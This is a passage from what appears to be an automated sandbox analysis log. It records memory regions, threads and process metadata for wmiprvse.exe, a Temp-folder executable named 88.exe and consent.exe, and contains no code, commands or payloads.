Region: id = 4381 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4382 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4383 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4384 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4385 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4386 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4387 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4388 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4389 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4390 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4391 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4392 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4393 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4394 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4395 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4396 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Thread: id = 137 os_tid = 0xf04 Thread: id = 138 os_tid = 0xc6c Thread: id = 139 os_tid = 0xc68 Thread: id = 140 os_tid = 0xc64 Thread: id = 141 os_tid = 0xc60 Thread: id = 142 os_tid = 0xc54 Thread: id = 143 os_tid = 0xc50 Thread: id = 144 os_tid = 0xc4c Thread: id = 163 os_tid = 0xf58 Process: id = "12" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x65878000" os_pid = "0x6e4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x248" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d101" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3234 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3235 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3236 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3237 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3238 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3239 start_va = 0x60000 end_va = 0x64fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 3240 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3241 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 3242 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 3243 start_va = 0xb0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 3244 start_va = 0x130000 end_va = 0x196fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3245 start_va = 0x250000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 3246 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3247 start_va = 0x410000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 3248 start_va = 0x510000 end_va = 0x697fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 3249 start_va = 0x6a0000 end_va = 0x820fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 3250 start_va = 0x830000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 3251 start_va = 0x8f0000 end_va = 0xbbefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3252 start_va = 0xbe0000 end_va = 0xc5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 3253 start_va = 0xc60000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 3254 start_va = 0xd60000 end_va = 0xddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 3255 start_va = 0xe30000 end_va = 0xeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 3256 start_va = 0xf10000 end_va = 0xf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 3257 start_va = 0xfa0000 end_va = 0x101ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 3258 start_va = 0x1050000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 3259 start_va = 0x10e0000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 3260 start_va = 0x1200000 end_va = 0x127ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 3261 start_va = 0x1290000 end_va = 0x130ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001290000" filename = "" Region: id = 3262 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3263 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3264 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3265 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3266 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3267 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3268 start_va = 0x13f260000 end_va = 0x13f2cbfff monitored = 0 entry_point = 0x13f29b450 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 3269 start_va = 0x7fef08e0000 end_va = 0x7fef092dfff monitored = 0 entry_point = 0x7fef08e1198 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 3270 start_va = 0x7fef1640000 end_va = 0x7fef1664fff monitored = 0 entry_point = 0x7fef1658d6c region_type = mapped_file name = "wmiperfclass.dll" filename = "\\Windows\\System32\\wbem\\WmiPerfClass.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiperfclass.dll") Region: id = 3271 start_va = 0x7fef4eb0000 end_va = 0x7fef4ec1fff monitored = 0 entry_point = 0x7fef4eb89d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 3272 start_va = 0x7fef5000000 end_va = 0x7fef5020fff monitored = 0 entry_point = 0x7fef50103b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 3273 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 3274 start_va = 0x7fef5310000 end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3275 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 3276 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 3277 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 3278 start_va = 0x7fef81e0000 end_va = 0x7fef8265fff monitored = 0 entry_point = 0x7fef81effd0 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3279 start_va = 0x7fef8430000 end_va = 0x7fef846bfff monitored = 0 entry_point = 0x7fef8455aa8 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Region: id = 3280 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3281 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3282 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3283 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3284 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3285 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3286 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3287 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3288 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3289 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3290 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3291 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3292 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3293 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3294 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3295 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3296 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3297 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3298 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3299 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3300 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3301 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3302 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3303 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3304 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3305 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3306 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3307 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 3308 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3309 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3310 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3311 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 3312 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3313 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 145 os_tid = 0xeb0 Thread: id = 146 os_tid = 0x770 Thread: id = 147 os_tid = 0x6a8 Thread: id = 148 os_tid = 0x43c Thread: id = 149 os_tid = 0x380 Thread: id = 150 os_tid = 0x6b8 Thread: id = 151 os_tid = 0xb4 Thread: id = 152 os_tid = 0x720 Thread: id = 175 os_tid = 0xfb8 Process: id = "13" image_name = "88.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\temp\\88.exe" page_root = "0x219dc000" os_pid = "0xf70" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xec4" cmd_line = "\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4450 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4451 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4452 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4453 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4454 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 4455 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 4456 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4457 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x4031a3 region_type = mapped_file name = "88.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\88.exe") Region: id = 4458 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4459 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4460 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 4461 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 4462 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 4463 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 4464 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4465 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4466 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Thread: id = 167 os_tid = 0xf74 Process: id = "14" image_name = "consent.exe" filename = "c:\\windows\\system32\\consent.exe" page_root = "0x231d4000" os_pid = "0xf7c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x360" cmd_line = "consent.exe 864 376 0000000003E80780" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d101" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 4471 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4472 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4473 start_va = 0x40000 end_va = 0x41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4474 start_va = 0x150000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4475 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file 